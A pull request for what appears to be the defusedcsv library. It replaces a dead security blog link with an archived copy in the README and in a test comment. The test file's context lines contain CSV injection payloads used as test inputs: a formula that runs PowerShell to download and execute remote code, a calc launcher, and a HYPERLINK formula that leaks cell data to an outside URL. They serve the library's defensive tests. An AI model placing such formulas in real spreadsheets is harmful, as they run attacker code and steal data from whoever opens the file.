### PR TITLE
Fix broken Context Information Security URL

### DIFF
--- a/README.rst
+++ b/README.rst
@@ -31,12 +31,12 @@ Useful Links
 ------------
 
 * `CSV Injection Software Attack | OWASP Foundation <https://owasp.org/www-community/attacks/CSV_Injection>`_
-* `Comma Separated Vulnerabilities | Context Information Security <https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/>`_
+* `Comma Separated Vulnerabilities | Context Information Security <https://web.archive.org/web/20220516052229/https://www.contextis.com/us/blog/comma-separated-vulnerabilities>`_
 * `CSV Injection Mitigations & Dangers | ZeroSec - Adventures In Information Security <https://blog.zsec.uk/csv-dangers-mitigations/>`_
 
 License
 -------
-The code in this repository is published under the terms of the Apache License. 
+The code in this repository is published under the terms of the Apache License.
 See the LICENSE file for the complete license text.
 
 This project is maintained by Raphael Michel <mail@raphaelmichel.de>. See the

--- a/tests/test_escape.py
+++ b/tests/test_escape.py
@@ -20,7 +20,7 @@ from defusedcsv.csv import _escape as escape
     ("@SUM(1+1)*cmd|' /C powershell IEX(wget 0r.pe/p)'!A0", "'@SUM(1+1)*cmd\\|' /C powershell IEX(wget 0r.pe/p)'!A0"),
     # https://hackerone.com/reports/72785
     ("-2+3+cmd|' /C calc'!A0", "'-2+3+cmd\\|' /C calc'!A0"),
-    # https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
+    # https://web.archive.org/web/20220516052229/https://www.contextis.com/us/blog/comma-separated-vulnerabilities
     ('=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")',
      '\'=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")'),
 


### PR DESCRIPTION
Context Information Security was [acquired by Accenture](https://newsroom.accenture.com/news/accenture-acquires-context-information-security-a-uk-based-cybersecurity-consultancy.htm), and its old website now redirects to Accenture's homepage. Therefore, I've replaced the CIS URL with its last Wayback Machine capture.